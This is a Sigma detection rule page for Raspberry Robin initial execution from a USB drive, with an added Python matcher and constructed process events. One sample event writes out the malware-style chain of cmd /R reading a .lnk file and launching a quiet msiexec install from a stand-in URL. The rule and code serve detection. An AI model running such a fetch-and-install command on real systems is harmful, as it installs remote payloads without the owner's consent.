Raspberry Robin initial execution from external drive
Detects execution from the external drive using cmd
Sigma rule
title: Raspberry Robin initial execution from external drive
description: Detects execution from the external drive using cmd
status: experimental
date: 2022/05/6
author: '@kostastsale'
references:
    - https://redcanary.com/blog/raspberry-robin/
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|endswith:
            - '*\cmd.exe'
        ParentCommandLine|contains:
            - '/r'
        Image|endswith:
            - '*\msiexec.exe'
        CommandLine|contains:
            - '/q'
            - '-q'
    selection2:
        CommandLine|contains:
            - 'http:'
            - 'https:'
        ParentCommandLine|endswith:
            - '.usb'
            - '.ico'
            - '.lnk'
            - '.bin'
            - '.sv'
            - '.lo'
    condition: selection1 and selection2
falsepositives:
    - Unlikely
level: high
tags:
    - attack.execution
    - attack.T1059.001
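To show what the rule actually fires on, here is an added Python matcher that applies the two selections and the `selection1 and selection2` condition to a few constructed Windows process-creation events. It is example code written for this page, not Sigma's, pySigma's or the rule author's. It assumes the Sigma Windows `process_creation` field names (`Image`, `CommandLine`, `ParentImage`, `ParentCommandLine`), Sigma's case-insensitive string matching with `*`/`?` wildcards, and sample events whose paths, command lines and `example.invalid` URL are all constructed for illustration.

```python
import re

# The detection section of the rule above, transcribed field-for-field.
# A list under a field is OR; the fields inside one selection are AND.
RULE = {
    "selection1": {
        "ParentImage|endswith": ["*\\cmd.exe"],
        "ParentCommandLine|contains": ["/r"],
        "Image|endswith": ["*\\msiexec.exe"],
        "CommandLine|contains": ["/q", "-q"],
    },
    "selection2": {
        "CommandLine|contains": ["http:", "https:"],
        "ParentCommandLine|endswith": [".usb", ".ico", ".lnk", ".bin", ".sv", ".lo"],
    },
}


def sigma_pattern(value: str, modifier: str) -> re.Pattern:
    """Turn one Sigma string value into a regex that honours the modifier.

    Sigma string matching is case-insensitive and treats '*' and '?' as
    wildcards, so the leading '*' on the rule's endswith values is redundant
    but valid.
    """
    body = "".join(
        ".*" if ch == "*" else "." if ch == "?" else re.escape(ch) for ch in value
    )
    if modifier == "contains":
        return re.compile(body, re.IGNORECASE)
    if modifier == "endswith":
        return re.compile(body + r"\Z", re.IGNORECASE)
    if modifier == "startswith":
        return re.compile(r"\A" + body, re.IGNORECASE)
    if modifier == "":  # no modifier: whole-string equality
        return re.compile(r"\A" + body + r"\Z", re.IGNORECASE)
    raise ValueError(f"unsupported modifier: {modifier}")


def field_matches(event: dict, key: str, values: list) -> bool:
    """True if the event field matches ANY of the listed values (OR)."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:  # a field absent from the event never matches
        return False
    return any(sigma_pattern(v, modifier).search(actual) for v in values)


def selection_matches(event: dict, selection: dict) -> bool:
    """True only if EVERY field in the selection matches (AND)."""
    return all(field_matches(event, key, vals) for key, vals in selection.items())


def rule_matches(event: dict) -> bool:
    """condition: selection1 and selection2"""
    return selection_matches(event, RULE["selection1"]) and selection_matches(
        event, RULE["selection2"]
    )


# Constructed Sysmon-style process_creation events; not real telemetry.
EVENTS = [
    {   # cmd /R reading a .lnk, spawning a quiet msiexec that fetches over HTTP
        "id": "evt-1",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r"cmd /R cmd<E:\RECOVERY.LNK",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": "msiexec /q /i http://example.invalid:8080/pkg.msi",
    },
    {   # routine scripted install: .bat parent, no /r, local package, no URL
        "id": "evt-2",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r"cmd /c install.bat",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /q /i C:\installers\tool.msi",
    },
    {   # quiet msiexec under 'cmd /R' but local package: selection1 only
        "id": "evt-3",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r"cmd /R E:\setup.cmd",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /q /i C:\setup\app.msi",
    },
]


def matching_events(events: list) -> list:
    """Return the ids of the events the rule alerts on."""
    return [e["id"] for e in events if rule_matches(e)]


if __name__ == "__main__":
    for e in EVENTS:
        print(e["id"], "ALERT" if rule_matches(e) else "no match")
```

Only `evt-1` alerts. `evt-3` satisfies every field of `selection1` (cmd with `/r` launching a quiet msiexec) but not `selection2`, which is why the rule ANDs the two selections: the URL in the msiexec command line and the drive-artifact extension at the end of the parent command line are what separate the Raspberry Robin chain from an ordinary scripted install. Note that `endswith` on `ParentCommandLine` is strict, so a trailing argument or whitespace after the `.lnk` would fall outside the rule as written.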
Related rules
- Raspberry Robin subsequent execution of commands
- ChromeLoader Malware Detection
- Emotet loader execution via .lnk file